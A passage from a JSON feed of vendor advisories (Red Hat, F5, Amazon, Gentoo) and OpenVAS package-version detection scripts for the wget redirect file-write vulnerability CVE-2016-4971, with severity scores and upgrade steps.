could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.\n#### Mitigation\n\nUse wget with "-O" option to explicitly specify the output filename. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-14T08:18:41", "type": "redhatcve", "title": "CVE-2016-4971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-05-06T18:32:04", "id": "RH:CVE-2016-4971", "href": "https://access.redhat.com/security/cve/cve-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "f5": [{"lastseen": "2021-06-08T18:45:13", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Versions known to be not vulnerable column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users.\u00c2 \n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\u00e2\u0080\u008b\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-13T00:00:00", "type": "f5", "title": "SOL55181425 - Wget vulnerability CVE-2016-4971", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-13T00:00:00", "id": "SOL55181425", "href": "http://support.f5.com/kb/en-us/solutions/public/k/55/sol55181425.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:23", "description": "\nF5 Product Development has assigned ID 490963 (ARX) and INSTALLER-2560 (Traffix SDC) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| 6.2.0 - 6.4.0| None| Low| **Wget** utility \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0| None| Low| **Wget** utility\n\nIf you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Versions known to be not vulnerable column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. \n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)[\u200b](<https://support.f5.com/csp/article/K4602>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-13T21:28:00", "type": "f5", "title": "Wget vulnerability CVE-2016-4971", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-13T21:28:00", "id": "F5:K55181425", "href": "https://support.f5.com/csp/article/K55181425", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "amazon": [{"lastseen": "2022-11-01T21:17:28", "description": "**Issue Overview:**\n\nGNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. (CVE-2016-4971)\n\n \n**Affected Packages:** \n\n\nwget\n\n \n**Issue Correction:** \nRun _yum update wget_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 wget-debuginfo-1.18-1.18.amzn1.i686 \n \u00a0\u00a0\u00a0 wget-1.18-1.18.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 wget-1.18-1.18.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 wget-1.18-1.18.amzn1.x86_64 \n \u00a0\u00a0\u00a0 wget-debuginfo-1.18-1.18.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2016-4971](<https://access.redhat.com/security/cve/CVE-2016-4971>)\n\nMitre: [CVE-2016-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T16:30:00", "type": "amazon", "title": "Medium: wget", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-14T16:30:00", "id": "ALAS-2016-720", "href": "https://alas.aws.amazon.com/ALAS-2016-720.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:21", "description": "### Background\n\nGNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Wget. Please review the CVE identifier and bug reports referenced for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU Wget users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/wget-1.18\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-29T00:00:00", "type": "gentoo", "title": "GNU Wget: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-10-29T00:00:00", "id": "GLSA-201610-11", "href": "https://security.gentoo.org/glsa/201610-11", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2020-01-27T18:33:58", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2016-1064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161064", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161064", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1064\");\n script_version(\"2020-01-23T10:42:04+0000\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:42:04 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:42:04 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2016-1064)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1064\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1064\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'wget' package(s) announced via the EulerOS-SA-2016-1064 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\");\n\n script_tag(name:\"affected\", value:\"'wget' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~10.2.h1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-19T00:00:00", "type": "openvas", "title": "Fedora Update for wget FEDORA-2016-e14374472f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wget FEDORA-2016-e14374472f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808447\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-19 05:26:11 +0200 (Sun, 19 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2016-e14374472f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"wget on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-e14374472f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/J5ZK7PPOISSBFIAIJP6AV6CDYCCBTL6G\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-11-04T00:00:00", "type": "openvas", "title": "RedHat Update for wget RHSA-2016:2587-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871702", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wget RHSA-2016:2587-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871702\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-04 05:42:42 +0100 (Fri, 04 Nov 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for wget RHSA-2016:2587-02\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The wget packages provide the GNU Wget file\nretrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n * It was found that wget used a file name provided by the server for the\ndownloaded file when following an HTTP redirect to a FTP server resource.\nThis could cause wget to create a file with a different name than expected,\npossibly allowing the server to execute arbitrary code on the client.\n(CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"wget on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2587-02\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-November/msg00023.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~13.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.14~13.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-18T00:00:00", "type": "openvas", "title": "Fedora Update for wget FEDORA-2016-2db8cbc2fd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808439", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wget FEDORA-2016-2db8cbc2fd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808439\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-18 05:26:44 +0200 (Sat, 18 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2016-2db8cbc2fd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"wget on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-2db8cbc2fd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5WRPRG5UOJBMTV4JL7KOKI4WU437DXG4\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-17T22:57:59", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-720)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120709", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120709", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120709\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:15 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-720)\");\n script_tag(name:\"insight\", value:\"GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. (CVE-2016-4971 )\");\n script_tag(name:\"solution\", value:\"Run yum update wget to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", 